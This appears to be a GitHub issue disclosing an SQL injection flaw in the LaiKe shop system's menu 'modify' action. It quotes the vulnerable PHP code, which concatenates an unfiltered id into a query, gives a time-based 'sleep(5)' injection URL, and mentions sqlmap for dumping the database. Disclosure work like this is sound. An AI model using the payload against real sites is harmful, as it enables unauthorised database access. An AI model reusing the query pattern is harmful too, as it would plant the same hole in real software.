We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
SQL injection exists in the LaiKetui menu management function
The link where SQL injection exists is http://127.0.0.1/LaiKe/app/LKT/index.php?module=menu&action=modify&id=1
http://127.0.0.1/LaiKe/app/LKT/index.php?module=menu&action=modify&id=1
Locate the vulnerable file /app/LKT/webapp/modules/menu/actions/modifyAction.class.php
/app/LKT/webapp/modules/menu/actions/modifyAction.class.php
Because the parameter id is not filtered, it leads to SQL injection vulnerabilities
public function getDefaultView() { $db = DBAction::getInstance(); $request = $this->getContext()->getRequest(); // 接收信息 $id = $request->getParameter("id"); $_SESSION['url'] = $_SERVER['HTTP_REFERER']; // 根据id,查询菜单 $sql = "select * from lkt_core_menu where id = '$id'"; $r_1 = $db->select($sql); public function getDefaultView() { $db = DBAction::getInstance(); $request = $this->getContext()->getRequest(); // 接收信息 $id = $request->getParameter("id"); $_SESSION['url'] = $_SERVER['HTTP_REFERER']; // 根据id,查询菜单 $sql = "select * from lkt_core_menu where id = '$id'"; $r_1 = $db->select($sql);
Use burpsuite to request url http://ceshi.io/laike/app/LKT/index.php?module=menu&action=modify&id=1' and sleep(5)--+
http://ceshi.io/laike/app/LKT/index.php?module=menu&action=modify&id=1' and sleep(5)--+
View SQL monitoring
Use sqlmap SQL injection Get the database
The text was updated successfully, but these errors were encountered:
No branches or pull requests
SQL injection exists in the LaiKetui menu management function
The link where SQL injection exists is
http://127.0.0.1/LaiKe/app/LKT/index.php?module=menu&action=modify&id=1
Locate the vulnerable file
/app/LKT/webapp/modules/menu/actions/modifyAction.class.php
Because the parameter id is not filtered, it leads to SQL injection vulnerabilities
Use burpsuite to request url
http://ceshi.io/laike/app/LKT/index.php?module=menu&action=modify&id=1' and sleep(5)--+
View SQL monitoring
Use sqlmap SQL injection
Get the database
The text was updated successfully, but these errors were encountered: